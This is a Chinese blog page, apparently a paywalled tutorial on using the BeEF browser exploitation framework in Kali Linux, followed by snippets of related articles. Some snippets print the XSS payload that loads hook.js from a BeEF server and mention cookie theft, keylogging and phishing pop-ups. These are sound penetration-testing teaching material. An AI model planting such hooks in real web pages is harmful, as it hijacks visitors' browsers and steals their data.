网安工具系列:kali之beef的基础使用

最新推荐文章于 2025-09-22 17:18:07 发布
最新推荐文章于 2025-09-22 17:18:07 发布
阅读量1.3k 收藏 1
点赞数 34
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 状态模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/137475149
网络安全 专栏收录该内容
218 篇文章 ¥299.90 ¥399.90
订阅专栏
本文介绍了Kali Linux下BeEF框架的基本使用,包括BeEF的介绍、安装与配置,以及如何通过BeEF获取cookie、实现网页重定向、弹出社工窗口等实际操作。BeEF是一个用于安全测试的工具,可以控制目标浏览器并进行多种渗透测试。

kali之beef的使用



kali之beef的使用

一、beef介绍

BeeF是前欧美最流行的web框架攻击平台kali早期版本会集成Beef,而且Beef有很多好用的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。

beef也是属于c/s结构,具体看图

在这里插入图片描述

zombie(僵尸)即受害的浏览器。zombie是被hook(勾连)的,如果浏览器访问了有勾子(由js编 写)的页面,就会被hook,勾连的浏览器会执行初始代码返回一些信息,接着zombie会每隔一段时间 (默认为1秒

了解本专栏 订阅专栏 解锁全文
BeEF的深入使用与编程
2301_79331328的博客
08-16 370
本文介绍了BeEF的安装配置、基本概念、攻击原理,并提供了一个简单的示例代码。BeEF(Browser Exploitation Framework)是一款开源的浏览器利用框架,它专注于Web浏览器的安全漏洞利用和攻击。BeEF提供了一套强大的工具和API,使安全研究人员能够测试Web应用程序的安全性,以及攻击者能够利用浏览器漏洞进行渗透测试和远程控制。BeEF提供了许多内置的Exploits和Modules,可以用于利用浏览器的漏洞和实施各种攻击。BeEF的深入使用与编程。
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 989
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 2842
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
kali下安装beef-xss报错-启动失败-简单详细
最新发布
mogexiuluo的博客
09-22 625
【代码】kali下安装beef-xss报错-启动失败-简单详细。
kali工具之Beef
wulanlin的博客
12-27 628
*本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.中间人 社会工程: 1
利用 BeEF 执行 XSS 攻击的总结
陌生人
05-27 1525
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
kali beef使用
pigzlfa的博客
07-05 514
beef的安装 可以直接安装也可以从源码安装,略 beef安装好后,打开web登陆页面 http://192.168.102.130:3000/ui/panel url为kali机地址,可以从配置文件中修改 3.把js加载进存在xss的地方(例pikachu) payload: <script src='http://192.168.102.130:3000/hook.js'></script> 可以看到在不停的向102.130发起请求 使用beef中终端发送弹窗 .
KaliBeef使用教程
weixin_43287317的博客
04-02 5649
KaliBeef使用教程
kalibeef使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
网络安全系列&网安知识系列:[译] 渗透测试实战第三版(红队版)
weixin_54626591的博客
10-17 528
[译] 渗透测试实战第三版(红队版)
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2863
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
【网络安全】红队渗透项目之Stapler1(上)
2401_84208172的博客
05-28 818
由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:image.png发现本kali ip为40段!image.png发现项目IP为152!image.pngimage.png以及smb2(windows445端口,共享用)利用!可以看到有很多容易受到攻击的端口都开着,FTP、NetBIOS、MySQL和运行Web服务器(Apache HTTPD)的端口12380等等!
beef的简单使用
weixin_44940180的博客
07-23 3781
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器) Beef一般和
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 2130
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
Kali使用beef
路~可以走过
06-04 6102
1.使用beef 2. 出现了要修改密码的路径,才能使用 2-1.修改beef用户的默认密码,修改密码为qwe123456 root@kali:~# vi /etc/beef-xss/config.yaml 3.退出终端,再次点击beef ,启动终端 4.登录web的beef 4-1.输入beef用户和修改的密码即可登录 5.查看xss的脚本 ...
Kali BeEF-XSS使用
nlj1860453的博客
01-08 682
kali终端输入“beef-xss”,显示没有安装。回车它会提示是否安装,输入y,等待安装完毕。
Beef工具使用
热门推荐
wo41ge的博客
02-22 2万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
KALI LINUX WEB 渗透测试视频教程—第16课 BEEF基本使用
weixin_30904593的博客
12-23 256
Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用 文/玄魂 目录 Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用....................... 1 BeEF......................................................................
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值